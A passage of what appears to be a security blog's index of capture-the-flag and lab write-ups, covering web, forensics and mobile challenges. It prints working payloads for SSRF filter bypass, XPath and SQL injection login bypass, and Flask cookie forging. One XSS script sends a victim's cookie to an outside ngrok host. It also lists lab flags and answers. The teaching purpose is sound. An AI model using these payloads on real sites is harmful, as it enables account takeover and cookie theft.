if result: return response(\u0026#39;User updated!\u0026#39;) return response(\u0026#39;Invalid username\u0026#39;), 400 I Tries using X-Forwarded-For headers but it didnt work.\nIf you look closer at the code there is a function to send a request to fetch the manual from a url.\nThis vulnerability is called ssrf (server side request forgery) check more \u0026raquo;\u0026gt; here\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 def downloadManual(url): safeUrl = isSafeUrl(url) if safeUrl: try: local_filename = url.split(\u0026#34;/\u0026#34;)[-1] r = requests.get(url) with open(f\u0026#34;/opt/manualFiles/{local_filename}\u0026#34;, \u0026#34;wb\u0026#34;) as f: for chunk in r.iter_content(chunk_size=1024): if chunk: f.write(chunk) return True except: return False return False There is also a poor attempt of a filter for the url\n1 2 3 4 5 6 7 8 9 blocked_host = [\u0026#34;127.0.0.1\u0026#34;, \u0026#34;localhost\u0026#34;, \u0026#34;0.0.0.0\u0026#34;] def isSafeUrl(url): for hosts in blocked_host: if hosts in url: return False return True We can easily bypass this , there are many routed to localhost other that the ones listed there. You can check them out \u0026raquo;\u0026gt; here\nFor me this one worked:\nNOTE: you can get the port that the app is listenig from in therun.py , we have to make a request to /api/addAdmin to make our user admin\n1 2 http://127.0.1.3:1337/api/addAdmin?username=test We get the flag as : HTB{A11_55RF_5C4rY_p4tch_3m_411!}\n","date":"2023-10-27T08:52:15+03:00","image":"https://f0rk3b0mb.github.io/cover/htb.svg","permalink":"https://f0rk3b0mb.github.io/p/hack_the_boo2023/","title":"Hack_the_boo2023"},{"content":"Thm owasp Command Injection Practical 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 What strange text file is in the website root directory? cmd: ls drpepper.txt How many non-root/non-service/non-daemon users are there? What user is this app running as? cmd: whoami www-data What is the user\u0026#39;s shell set as? What version of Ubuntu is running? cmd: lsb_release -a 18.04.4 Print out the MOTD. What favorite beverage is shown? cmd: cat /etc/update-motd.d/00-header DR PEPPER Broken Authentication Practical 1 2 3 4 5 6 7 8 9 10 11 12 What is the flag that you found in darren\u0026#39;s account? fe86079416a21a3c99937fea8874b667 What is the flag that you found in arthur\u0026#39;s account? d9ac0f7db4fda460ac3edeb75d75e16e Sensitive Data Exposure 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 What is the name of the mentioned directory? /assets Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? webapp.db Use the supporting material to access the sensitive data. What is the password hash of the admin user? 6eea9b7ef19179a06954edd0f6c05ceb Crack the hash. What is the admin\u0026#39;s plaintext password? qwertyuiop Login as the admin. What is the flag? THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl} XML External Entity 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 What is the name of the user in /etc/passwd falcon Where is falcon\u0026#39;s SSH key located? /home/falcon/.ssh/id_rsa What are the first 18 characters for falcon\u0026#39;s private key MIIEogIBAAKCAQEA7b Broken Access Control (IDOR Challenge) 1 2 3 4 5 6 7 8 9 10 Look at other users notes. What is the flag? payload : http://10.10.145.127/note.php?note=0 flag{fivefourthree} Security Misconfiguration 1 2 3 4 5 6 7 8 Hack into the webapp, and find the flag! creds: pensive:PensiveNotes thm{4b9513968fd564a87b28aa1f9d672e17} XSS 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 Navigate to http://10.10.98.36/ in your browser and click on the \u0026#34;Reflected XSS\u0026#34; tab on the navbar; craft a reflected XSS payload that will cause a popup saying \u0026#34;Hello\u0026#34;. ThereIsMoreToXSSThanYouThink On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. ReflectiveXss4TheWin Then add a comment and see if you can insert some of your own HTML. HTML_T4gs On the same page, create an alert popup box appear on the page with your document cookies. W3LL_D0N3_LVL2 Change \u0026#34;XSS Playground\u0026#34; to \u0026#34;I am a hacker\u0026#34; by adding a comment and using Javascript. websites_can_be_easily_defaced_with_xss Insecure Deserialization 1 2 3 4 5 6 7 8 9 10 Who developed the Tomcat application? The Apache Software Foundation What type of attack that crashes services can be performed with insecure deserialization? denial of service Insecure Desirialization 1 2 3 4 5 6 7 8 9 10 11 1st flag (cookie value) THM{good_old_base64_huh} 2nd flag (admin dashboard) THM{heres_the_admin_flag} Insecure Deserialization - Code Execution 1 2 3 4 5 6 flag.txt 4a69a7ff9fd68 Components with know vulns 1 2 3 4 5 6 7 How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) exploit : https://www.exploit-db.com/exploits/47887 1611 Insufficient Logging and Monitoring 1 2 3 4 5 6 7 8 9 10 What IP address is the attacker using? 49.99.13.16 What kind of attack is being carried out? brute force ","date":"2023-10-25T13:12:22+03:00","image":"https://f0rk3b0mb.github.io/cover/thm.svg","permalink":"https://f0rk3b0mb.github.io/p/thm_owasp/","title":"Thm_owasp"},{"content":"Blackhat Mea 2023 ctf writeup We participated this ctf as Chasing X fr334aks X L3v3l 6 and managed to get pos 178. It wasn\u0026rsquo;t easy. I Managed to solve the web challenge below.\nAuthy For this challenge we are provided with an api endpoint and challenge source\nAccording to the LoginController.go file we can create a user and login , the user password length should not be less than 6\nThe vulnerability occurs when the user passowrd value in the registration function is not the one being compared in the login function. To get the flag we have to login with a password of length \u0026lt; 6.\nThe vulnerable code:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 //registration if len(user.Password) \u0026lt; 6 { log.Error(\u0026#34;Password too short\u0026#34;) resp := c.JSON(http.StatusConflict, helper.ErrorLog(http.StatusConflict, \u0026#34;Password too short\u0026#34;, \u0026#34;EXT_REF\u0026#34;)) return resp } //login if len(password) \u0026lt; 6 { flag := os.Getenv(\u0026#34;FLAG\u0026#34;) res := \u0026amp;Flag{ Flag: flag, } resp := c.JSON(http.StatusOK, res) log.Info() return resp } With my vast ctf experience i could tell what i needed to do :)\nTHe logic is :\n1 2 3 4 5 user.Name := \u0026#34;😃\u0026#34; // Contains 1 emoji character lengthOfString := len(user.Name) // Length of the string (bytes) - 4 (UTF-8 encoding) lengthOfRuneSlice := len([]rune(user.Name)) // Length of rune slice (code points) - 1 So i sent the request for registration with the password as two smileys and login with the same password. In the backend the register will see a length of 8 and login will see a length of 2 thus solving the challenge\n1 2 3 4 5 curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;, \u0026#34;Firstname\u0026#34;: \u0026#34;John\u0026#34;, \u0026#34;Lastname\u0026#34;: \u0026#34;Doe\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/registration curl -X POST -H \u0026#34;Content-Type: application/json\u0026#34; -d \u0026#39;{\u0026#34;Username\u0026#34;: \u0026#34;ping\u0026#34;, \u0026#34;Password\u0026#34;: \u0026#34;🤣🤣\u0026#34;}\u0026#39; http://af78671fe39ff1e0e18d2.playat.flagyard.com/login The ctf was great and see you in the next one\n","date":"2023-10-09T16:06:15+03:00","image":"https://f0rk3b0mb.github.io/cover/bh.png","permalink":"https://f0rk3b0mb.github.io/p/blackhat_mea_2023/","title":"Blackhat_mea_2023"},{"content":"Shehacks intervasity ctf 2023 This ctf onsite at usiu , nairobi . I particpated online.\nweb category\nGraph1 This was an easy chalenge that tested knowledge in graphql queries\nthe graphql endpoint was located at /graphql.\nfor more info on how to enumerate graphql \u0026raquo; here\nSo basicaly if we send the query below we get introspection on the grapql endpoint\n1 {__schema{types{name,fields{name}}}} You can then use \u0026raquo; here to visualize the schema\nremember to set the content-type to \u0026ldquo;appication/graphql\u0026rdquo; when sending the request\nFrom this we find out that there is a field known as getFlag. We can then run the query below to get the flag . It was base64 encoded , so we decode it to get the flag\nX marks the spot In this challenge we are given a web application login field , i tried sql injection at first an an error was thrown\n1 SimpleXMLElement::xpath(): Invalid predicate in \u0026lt;b\u0026gt;/var/www/html/backend.php This indicated that the appication is vulnerable to xpath injection\nyou can check the payloads \u0026raquo; hacktricks xpath\ni tried the payload\n1 \u0026#39;or 1=1 or\u0026#39; this is able to bypass login and i get the result\n1 {\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;supersecret\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;api-admin-key\u0026#34;} to move laterally through accounts i used the following payload , i achieved this after after trying lots of payloads\n1 \u0026#39;or position()=3 or\u0026#39; by changing the number above we can basically login as different users , in this case 3 gets us the flag.\nPS i got first blood on this challenge :)\n1 {\u0026#34;username\u0026#34;:\u0026#34;ali\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;654321\u0026#34;,\u0026#34;api-key\u0026#34;:\u0026#34;flag{s0m30n3_n33ds_1npu7_v4l1d4t10n}\u0026#34;} secrets For this challenge you are provided with a signin page and you can also register.\nWe have to manipulate the cookie to become the admin user. For this i used the tool flask-unsign , you can get it \u0026raquo; here\n1 2 3 flask-unsign --decode --cookie \u0026#34;.eJwljkFOBDEMBP-SM4fYjuN4PzOKYxtWiAHN7J4Qf2cQx26pSvVdtjzifCu3x_GMl7LdvdwKyJKcbQnKyJARCmralZw6kPrsiDrYxnSBmQ0SclBMrk5cRyUF55qcuRb2RSbDZGkjTsLBfXpQY21iyd2hUiYahseQBp2tXCHPM47_GuJrr_PI7fH5Hvv1rOE4Wpi4IjjMqmJx1UX1XqtPNKsa2C7uT7PPj7ior_v-Wn5-AZmVRW0.ZQ5wGQ.2gLkeklbQ2OS2GBjMTAi2uiVKWI\u0026#34; {\u0026#39;_fresh\u0026#39;: True, \u0026#39;_id\u0026#39;: \u0026#39;17c7fa4c7278fe78e919b9693d36139da622985b8ad71af41f1f83ea50d35080391d50f5ffcc26c3b78b7c9435f32856ade345947bf56d103ff2b2ede874165b\u0026#39;, \u0026#39;_user_id\u0026#39;: \u0026#39;35\u0026#39;, \u0026#39;csrf_token\u0026#39;: \u0026#39;c8d284eb7d921d1a097be93de0d600da2bb09e24\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;ping\u0026#39;} We then have to change the uid to 1 and username to admin and then sign the cookie with secretkey \u0026lsquo;SheHacks\u0026rsquo;\n1 2 3 4 flask-unsign --sign --cookie \u0026#34;{ \u0026#39;_user_id\u0026#39;: \u0026#39;1\u0026#39;, \u0026#39;username\u0026#39;: \u0026#39;admin\u0026#39;}\u0026#34; --secret \u0026#39;SheHacks\u0026#39; eyJfdXNlcl9pZCI6IjEiLCJ1c2VybmFtZSI6ImFkbWluIn0.ZQ59CA.CUKCpa3SPstLemcqmuEDrSqmpFI Using this cookie we can get the flag : flag{s3c3ts_4re_n0_l0ng3r_s4f3}\nforensics category\nSnifferDog1 How many packets in total passed through port 445 shctf{Ans}\nFor this we just use the filter \u0026ldquo;tcp.port == 445\u0026rdquo; then check the bottom right of wireshrk for number of packets shctf{10223}\nSniffer Dog2 What is the 6th disallowed item listed in http://192.168.56.103:8081/robots.txt?\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103 \u0026amp;\u0026amp; tcp.port == 8081 \u0026amp;\u0026amp; http\u0026rdquo; then find \u0026ldquo;robots.txt\u0026rdquo;\nshctf{installation}\nSnifferDog3 What version of Jenkins is running on 192.168.56.103? shctf{VersionOnly}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;jenkins\u0026rdquo;\nshctf{1.647}\nSnifferDog4 What is the domain SID for 192.168.56.103 shctf{S\u0026hellip;}\nFor this we just use the filter \u0026ldquo;ip.addr == 192.168.56.103\u0026rdquo; then find \u0026ldquo;S-1-5\u0026rdquo; this is the format for sid you can learn more \u0026raquo; here\nshctf{S-1-5-21-2950693484-2233299975-203034155}\n","date":"2023-09-22T14:29:32+03:00","image":"https://f0rk3b0mb.github.io/cover/shehacks.png","permalink":"https://f0rk3b0mb.github.io/p/shehacks_intrervasity_2023/","title":"Shehacks_intrervasity_2023"},{"content":"Windows event log analysis is an important skill in threat hunting. These logs silently record system events, security incidents, and user interactions, providing crucial insights into system health and security. In this blog, we will explore the art of Windows Event Log analysis\nIm going to discuss log analysis of windows events in linux, we will be utilizing a tool called chainsaw, you can get it \u0026raquo; here.\nIn this tutorial i will be analysing the files from cybertalents blue scholarship.\n1. chainsaw search an attacker after compromising the machine added a new account as admin. can you find the name of the new account? flag format : flag{md5 of string}\nfile \u0026raquo;\u0026raquo; ex1\nIn windows, each event has a unique event id. So we have to find event id for account creation , a quick google search\nThen in chainsaw\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4720\u0026#39; Security436509324654726509.evtx Here we can filter events with the event id 4720.\nSAM means security account manager , it is a database that stores accounts on windows systems. Usename is sam md5hash ba0e0cde1bf72c28d435c89a66afc61a.\nflag{ba0e0cde1bf72c28d435c89a66afc61a}\n2. chainsaw hunt file \u0026raquo;\u0026raquo; here\n1 2 3 4 5 6 7 Our network got compromised two days ago by an unknown attacker, and we need to get an answer for the following questions: 1. What is the domain\u0026#39;s SID? 2. The attacker failed to login to some accounts, What is the attacker\u0026#39;s machine IP address? 3. What is the workstation\u0026#39;s name that the attacker was using to authenticate with the administrator account? Flag format: Flag{ANS1_ANS2_ANS3} Since this is account failed login it has event id 4776 for failed login from domain controller. The domain controller in this case is HYDRA-DC.MARVEL.local.\nSince chainsaw has rules to detect certain events , you can use the folowing command to hunt for events\n1 2 ./chainsaw/chainsaw-gnu hunt -r ./chainsaw/rules/ logs.evtx This returns alot of output , but retuns events in a format we can easily comprehend.\n1 2 ./chainsaw/chainsaw-gnu hunt --sigma ./chainsaw/sigma/ --mapping ./chainsaw/mappings/sigma-event-logs-all.yml -r ./chainsaw/rules/lateral_movement/ logs/ You can use the command above to get more info. Now here is where the fun begins.\nFrom the logs we can see that there are several users lke pbarker,fcasle, Administrator and these avents are have a common ipaddress \u0026ldquo;192.168.80.128\u0026rdquo;\nIf we search for the following users in the sigma output , we can find the sid\npbarker : S-1-5-21-271597537-2992796785-3713134209-1105\nfcastle: S-1-5-21-271597537-2992796785-3713134209-1103\nAdminitrator : S-1-5-21-271597537-2992796785-3713134209-500\nThe structure of an sid is as follows :\nS-1-5-21--\u0026lt;relative_id\u0026gt;\nWhere:\nS: A constant prefix indicating that it is a Security Identifier.\n1: Revision number (currently always 1).\n5: Identifier authority value (the identifier authority for Windows is always 5).\n21: The identifier authority\u0026rsquo;s top-level domain identifier. The actual number may vary depending on the Windows version or configuration but is typically 21 for Windows domains.\n: The SID for the domain. It is a unique value assigned to each domain by the domain controller during domain creation.\n\u0026lt;relative_id\u0026gt;: A relative identifier that uniquely identifies a specific security principal within the domain. For users and groups, this relative ID is usually the RID (Relative Identifier) assigned by the domain controller.\nso in this case domain sid is \u0026ldquo;S-1-5-21-271597537-2992796785-3713134209\u0026rdquo;\nTo get the workstation you can ue the command we used earlier to filter events using event id\n1 2 ./chainsaw/chainsaw-gnu search -t \u0026#39;Event.System.EventID: =4776\u0026#39; logs/ | grep -i workstation workstation: THEPUNISHER\nflag is Flag{S-1-5-21-271597537-2992796785-3713134209_192.168.80.128_THEPUNISHER}\n","date":"2023-07-31T16:18:16+03:00","image":"https://f0rk3b0mb.github.io/cover/4020769.jpg","permalink":"https://f0rk3b0mb.github.io/p/windows-events-and-log-analysis/","title":"Windows events and log analysis"},{"content":"ImaginaryCTF Imaginaryctf web writeups Idoriot This web challenge was very simple , while registering a new user you could set their id , so just set user_id as 0 and login to get the flag.\nIdoriot revenge This challenge is related to the first one but we can set the user id as a parameter , in the source , there is this filter\n1 2 3 4 5 6 7 8 9 10 11 if (isset($_GET[\u0026#39;user_id\u0026#39;])) { $user_id = (int) $_GET[\u0026#39;user_id\u0026#39;]; // Check if the user is admin if ($user_id == \u0026#34;php\u0026#34; \u0026amp;\u0026amp; preg_match(\u0026#34;/\u0026#34;.$admin[\u0026#39;username\u0026#39;].\u0026#34;/\u0026#34;, $_SESSION[\u0026#39;username\u0026#39;])) { // Read the flag from flag.txt $flag = file_get_contents(\u0026#39;/flag.txt\u0026#39;); echo \u0026#34;\u0026lt;h1\u0026gt;Flag\u0026lt;/h1\u0026gt;\u0026#34;; echo \u0026#34;\u0026lt;p\u0026gt;$flag\u0026lt;/p\u0026gt;\u0026#34;; } } it checks if the user_id is equal to \u0026ldquo;php\u0026rdquo; and if the username contains \u0026ldquo;admin\u0026rdquo;.\nThis is classic php type juggling read more \u0026raquo; here there is also a chart on the pdf showing what will be regerded as True or False in php, in this case if i set user_id=0 it will be equal to \u0026ldquo;php\u0026rdquo;. For the username , register any user with a username that contains \u0026ldquo;admin\u0026rdquo; but not \u0026ldquo;admin\u0026rdquo; like eg (admino) to satisfy the regex check.\nBlank This challenge tested knowledge is sql.\n1 2 db.get(\u0026#39;SELECT * FROM users WHERE username = \u0026#34;\u0026#39; + username + \u0026#39;\u0026#34; and password = \u0026#34;\u0026#39; + password+ \u0026#39;\u0026#34;\u0026#39;, (err, row) =\u0026gt; { as you can see , user input is directly added to the sql statement which is very dangerous. Also the application was not checking the password.\n1 2 3 4 app.get(\u0026#39;/flag\u0026#39;, (req, res) =\u0026gt; { if (req.session.username == \u0026#34;admin\u0026#34;) { res.send(\u0026#39;Welcome admin. The flag is \u0026#39; + fs.readFileSync(\u0026#39;flag.txt\u0026#39;, \u0026#39;utf8\u0026#39;)); } THe username had to be \u0026ldquo;admin\u0026rdquo;. so we can only inject via password field\nThis will satisfy this part of the code and return rows\n1 2 3 4 5 if (row) { console.log(row,req.session.username); req.session.loggedIn = true; req.session.username = username; res.send(\u0026#39;Login successful!\u0026#39;); Perfect picture This challenge required uploading a picture with specific characterictics\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 def check(uploaded_image): with open(\u0026#39;flag.txt\u0026#39;, \u0026#39;r\u0026#39;) as f: flag = f.read() with Image.open(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image) as image: w, h = image.size if w != 690 or h != 420: return 0 if image.getpixel((412, 309)) != (52, 146, 235, 123): return 0 if image.getpixel((12, 209)) != (42, 16, 125, 231): return 0 if image.getpixel((264, 143)) != (122, 136, 25, 213): return 0 with exiftool.ExifToolHelper() as et: metadata = et.get_metadata(app.config[\u0026#39;UPLOAD_FOLDER\u0026#39;] + uploaded_image)[0] try: if metadata[\u0026#34;PNG:Description\u0026#34;] != \u0026#34;jctf{not_the_flag}\u0026#34;: return 0 if metadata[\u0026#34;PNG:Title\u0026#34;] != \u0026#34;kool_pic\u0026#34;: return 0 if metadata[\u0026#34;PNG:Author\u0026#34;] != \u0026#34;anon\u0026#34;: return 0 except: return 0 return flag to satisfy those i wrote a python script\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 from PIL import Image def create_and_modify_image(): # Step 1: Create the Image width, height = 690, 420 image = Image.new(\u0026#34;RGBA\u0026#34;, (width, height), (255, 255, 255, 0)) # Step 2: Modify Pixel Colors image.putpixel((412, 309), (52, 146, 235, 123)) image.putpixel((12, 209), (42, 16, 125, 231)) image.putpixel((264, 143), (122, 136, 25, 213)) # Step 3: Save the Image image.save(\u0026#34;created_image.png\u0026#34;) if __name__ == \u0026#34;__main__\u0026#34;: create_and_modify_image() you also have to run the following command to set the exit data\n1 2 exiftool -PNG:Description=\u0026#34;jctf{not_the_flag}\u0026#34; -PNG:Title=\u0026#34;kool_pic\u0026#34; -PNG:Author=\u0026#34;anon\u0026#34; created_image.png Roks This challenge was obviously an lfi\nphp urldecode() only decodes once i.e it only decodes one layer , so if i encode on several layers i can bypass the filter which only decoded 2 layers\nthe flag was at ../../../../flag.png according to the dockerfile , urlencode this 3 times and send it to get the flag\nLogin This challenge tested knowledge in sql and bcrypt hashing.\nUsing sqlmap you could extract the database table users and data\n1 2 3 4 pwhash,username $2y$10$vw1OC907/WpJagql/LmHV.7zs8I3RE9N0BC4/Tx9I90epSI2wr3S.,guest $2y$10$Is00vB1hRNHYBl9BzJwDouQFCU85YyRjJ81q0CX1a3sYtvsZvJudC,admi the hashes are clearly bcrypt\nto login as admin we can use the following sql statement. I got it from \u0026raquo; here . Here we can set our own bcrypt hash which we have knowledge of the password.\n1 2 3 4 5 xxx\u0026#39; UNION SELECT \u0026#39;admin\u0026#39; AS username,\u0026#39;$2y$10$C4lfi0f8kouggVBFkKF1ru./NEQTKqptjJCh6JI/hJieELWHLeFXi\u0026#39; AS pwhash-- and the password as \u0026#34;a\u0026#34; Here we get the magic , in my case it was \u0026ldquo;688a35c685a7a654abc80f8e123ad9f0\u0026rdquo;\nIn the code if we supply the magic as a get parameter the flag will be appended to the password , Bcrypt has a character limit of 72 , so if we set a password of more than 72 characters it will be truncated and only the first 72 characters will be hashed as the password . I had seen technique in an ippsec video recently https://www.youtube.com/watch?v=E5TOeiCnGkE\u0026amp;t=3183s , Luckyme :)\nAnyways here is the exploit \u0026raquo; here\nflag : ictf{why_are_bcrypt_truncating_my_passwords?!}\n","date":"2023-07-23T12:41:18+03:00","image":"https://f0rk3b0mb.github.io/cover/imaginary_ctf.jpg","permalink":"https://f0rk3b0mb.github.io/p/imaginaryctf2023/","title":"ImaginaryCTF2023"},{"content":"Wireshark packet analysis (basic) To demonstrate this, I will be analyzing a pcap from bicWC. You can also download this pcap and follow along \u0026raquo; here.\nYou can also download this \u0026raquo; here. I will use this pcap to demonstrate how to extract files from captured network traffic.\nDEMO 1 How many packets have been captured?\nThe number of packets is shown at the right bottom of the screenshot above: 1309\nWhat is the IP address of the attacker?\nHere we will use the TCP filter in Wireshark as shown below:\nThe IP address is 45.15.156.72\nWhich city is the IP address based in?\nWe will use an online IP locator tool:\nThe city is Amsterdam\nHow many DNS servers are in the pcap?\nHere we just use the DNS filter in Wireshark:\nThe answer is two. There is one with IP xxx.100 and xxx.101\nWhat is the IP of the NTP server?\nHere we will use the NTP filter in Wireshark:\nThe IP address, as you can see above, is 51.145.123.29\nWhat machine ID was transmitted to the attacker?\nHere we will follow the TCP stream of one of the requests to the attacker as shown below. This time we will use the IP address filter \u0026lt;ip.addr == 45.15.156.72\u0026gt;:\nThe machine ID is a parameter of the POST request.\nWhat is the user-agent?\nAs you can see from the picture above, the user-agent is \u0026ldquo;x\u0026rdquo;\nWhat was the MAC address of the compromised machine?\nWe just have to double click on one of the TCP packets between the attacker and compromised machine as shown below. The MAC address is on the blue line I have highlighted:\nWhat email address is the registrar of the IP address?\nHere we will conduct a WHOIS search on the IP address. To make it even easier, we will combine it with a grep filter for the @ symbol, which is used in email addresses:\nDEMO 2 Scrolling through the pcap, you can see weird filenames ending in .ts. I googled this and found out that it is a file extension for video files.\nTo extract files, you will first have to identify the stream of the files you want to extract. In this case, it\u0026rsquo;s stream 3. Select packet \u0026gt; right click \u0026gt; follow TCP stream.\nYou can move through subsequent streams by using the stream buttons:\nYou now have to export the stream to a file. In my case, I called the file filtered.pcapng:\nOpen the filtered.pcapng in Wireshark. Go to File \u0026gt; Export Objects \u0026gt; HTTP:\nYou can click on each and then save. The resulting files can be opened with any video player. The flag is in WyK2SW5mcYDArna2IlwZ4C4SwDjZ717a5.ts.\nThe above challenges are a good entry to learning to use Wireshark and understanding networking.\n","date":"2023-07-14T11:47:02+03:00","image":"https://f0rk3b0mb.github.io/cover/5613.jpg","permalink":"https://f0rk3b0mb.github.io/p/packet-analysis-using-wireshark/","title":"Packet analysis using Wireshark"},{"content":"Nahamcon CTF 2023 writeups warmups blobber Thic challenge had a downloadable part , the file was a sqlite database.\nI opened the file using sqlite database browser\nbrowsing the data there is only gibberish , except on line 238 where data is a blob object.Blobs in sqlite is whereby files can be addedtto database as entries. Read more here\nwe can use this sql statement to get the blob\n1 2 select data from blobber where id=238 Then save it to a file , the resulting file in is a bzip2 archive, extracting , you get an image of the flag\nninety one In this challenge you are provided with an encoded string\n1 @iH\u0026lt;,{|jbRH?L^VjGJH\u0026lt;vn3p7I,x~@1jyt\u0026gt;x?,!YAJr*08P I used this tool \u0026raquo; here to analyse and decode it , it was encrypted using base91 encoding\n1 2 flag{dfb88c7d9ca38e71dc27e1072fc43d1b} glasses This challenge you were provided with a webpage. It had no functionality, based on the title of the challenge it is obvious that we nee to find something hidden.\nLokking through the source I found obfuscated js code. You can use this tool \u0026raquo; here to deobfuscate it . It returns html code the with the flag\n1 2 flag{8084e4530cf649814456f2a291eb81e9} web category starwars In this challenge you are provided with a web endpoint that allows you to signup and login The goal is to login as admin , you can also comment and the admin reviews your comment , obvoiusly it is classic xxs\nthis below is the payload i used . it fetches my ngrok endpoint with the cookie appanded at the end. I dont know if the first part was necessary , I generated it by trial and error and it worked\n1 2 3 4 5 6 \u0026#34;\u0026gt;\u0026lt;script\u0026gt; var iframe = document.body.appendChild(document.createElement(\u0026#39;iframe\u0026#39;)); iframe.style.cssText = \u0026#39;height: 500px; width: 100%\u0026#39;; iframe.src = \u0026#39;http://challenge.nahamcon.com:30467/signup\u0026#39;; iframe.onload = function() { fetch(\u0026#39;http://f910-102-167-145-177.ngrok-free.app?iframeContents=\u0026#39; + btoa(window.document.cookie), { method: \u0026#39;GET\u0026#39; }).then(response =\u0026gt; response.json()).then(data =\u0026gt; console.log(data)).catch(error =\u0026gt; console.error(error)); };\u0026lt;/script\u0026gt; the flag will be returned in base64 format. Use it in the browser to access /admin page and the flag\nmisc category zombies In this challenge you were provided with an ssh endpoint to connect to\nreading the file .user-entrypoint.sh\nnohup is enables a program to run even after a terminal window is closed , if you check running processes you can see that tail is still running. Running processes usually have the activities stored in /proc directory. in the image below 11 is the pid of the tail process\nmobile category This challenge requires a set of tools to be able to do anything :\ndex2jar\njdgui\nghidra\ngenymotion \u0026laquo; android emulator on pc\nadb\napktools\njninjaspeak In this challnge you are provided with an apk file , you can install it on genymotion using adb, it is a simple prompt that converts input to jninjaspeak.\n1 adb install jninjaspeak.apk Decompile the application using apktool\n1 2 use : apktool -r -s d jninjaspeak.apk We use -r -s flags to tell apktool not to decompile the dexfiles to smali which it does by default.\nConvert the dex files to jar using dex2jar to be able to view the source using jdgui.\nIn the mainactivity we see that the program needs libjninjaspeak.so liblary that is used to translate the input.\nHere we use ghidra to reverse engineer the liblary , the liblary is in the /lib in the folder apktool generated.\nIn ghidra , in the main function of the liblary we find the flag\nflag{1f539e4a706e6181dae9db3fad6a78f1}\nFortune teller For this challenge follow the above steps to install and decompile the application and convers dex files to jar.\nThe mainactivity function in located the classes3.dex. Looking closely you can see that the application uses our input as a key to decrypt an encrypted file , the encryption used is AES.\nThe file is decrypted in the decrypt.class. Where our input is used in the SecretKeySpec object.\nBased on my simple java programming undertanding :) there is a variable called correctString that is initialized in the main function.\nIt is followed by its getter function\nand then tracing it we find the setter function\nIt sets correctString to the value by resource id 2131755048 . Resource ids can be traced what that point to in the classes2.dex, path is shown below\nIt is point to a string , the resorces can be found the /res folder since the value is a string we goto /res/values and cat strings.xml.\nThe key is \u0026ldquo;you won this ctf\u0026rdquo; , enter it and get the flag\nwheres waldo In this challenge you are provided with an apk file , follow the steps above to decompile it and open the sources in jd gui and install it in the emulator.\nThis application is some type of maps applcation so the objective is to find the location of waldo in the map.\nAnalysing the mainactivity function you can see thet the application is making a request to an endpoint which determines id we have found waldo and the distance from him\nThe objective is to set longitude and latitude that results on the off_by value to result to zero as you can see below\n1 2 3 4 mapView1.getController().setCenter((IGeoPoint)new GeoPoint(location.getLatitude(), location.getLongitude())); Request request = (new Request.Builder()).url(\u0026#34;http://challenge.nahamcon.com:30001/location?lat=\u0026#34; + location.getLatitude() + \u0026#34;\u0026amp;long=\u0026#34; + location.getLongitude()).build(); Response response = (new OkHttpClient()).newCall(request).execute(); the code above takes the off_by and calculates the distance from waldo by miles.\nI scripted this python program to do all the hardwork (at least).\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import requests def calculate_distance(latitude, longitude): url = f\u0026#39;http://challenge.nahamcon.com:30001/location?lat={latitude}\u0026amp;long={longitude}\u0026#39; print(url) # Replace with the actual API endpoint response = requests.get(url) print(response.text) data = response.json() off_by = data.get(\u0026#34;off_by\u0026#34;) i = off_by print(i) return(i) def move(): pos=list() for x in range(-180,180,30): for y in range(0,30,2): dis=calculate_distance(y,x) pos.append(list) print(pos) move() The code above i used to be able to narrow down on which coordinated produces the least distance from waldo\n1 2 3 4 lat=30\u0026amp;long=-60 low 1099.613580066382 this was the lowest from here i entered the values manually by trying raising the value higher or lower and chacking the changes in the distance\nat lat=40.60 and long -74.67 we needed to go even smaller units so i researched and found out that api use the following format to show distance\n1 2 3 4 Latitude: ±DD.DDDDDD Longitude: ±DDD.DDDDDD where D is any number between 1-9 final position lat=40.583333 and long=-74.67\n","date":"2023-06-15T20:58:33+03:00","permalink":"https://f0rk3b0mb.github.io/p/nahamcon2023/","title":"Nahamcon2023"},{"content":"htb pc writeup category: web\ndifficulty: easy\nHello, and welcome to another walkthrough of a htb machine.\nWhen you run a port scan on the target we get port 22 open , a full port scan reveals port 50015 that nmap cannot tell the service which it is running\n1 2 open port 22 open port 50015 a little reserarch i found out that the service is grpc \u0026raquo; for more datails of what it is here\nTo interect with grpc we need some tools one of them is called grpcurl and there is also grpcui\nThey are golang application so you need to have goland installed on your machine.\nIn this procudure i am going to use grpcui , the difference between the two is one has ui and the other is cli.\nwe create a new user test:test, we login in and are given a jwt token. I f we make a request to the getinfo() we receive response as shown below.\nThere is an id field we can try different ids and it returns an error , if you append a single quot it returns a format error , this is a good indicator of sqli.\n1 \u0026#34;message\u0026#34;: \u0026#34;Unexpected \\u003cclass \u0026#39;TypeError\u0026#39;\\u003e: bad argument type for 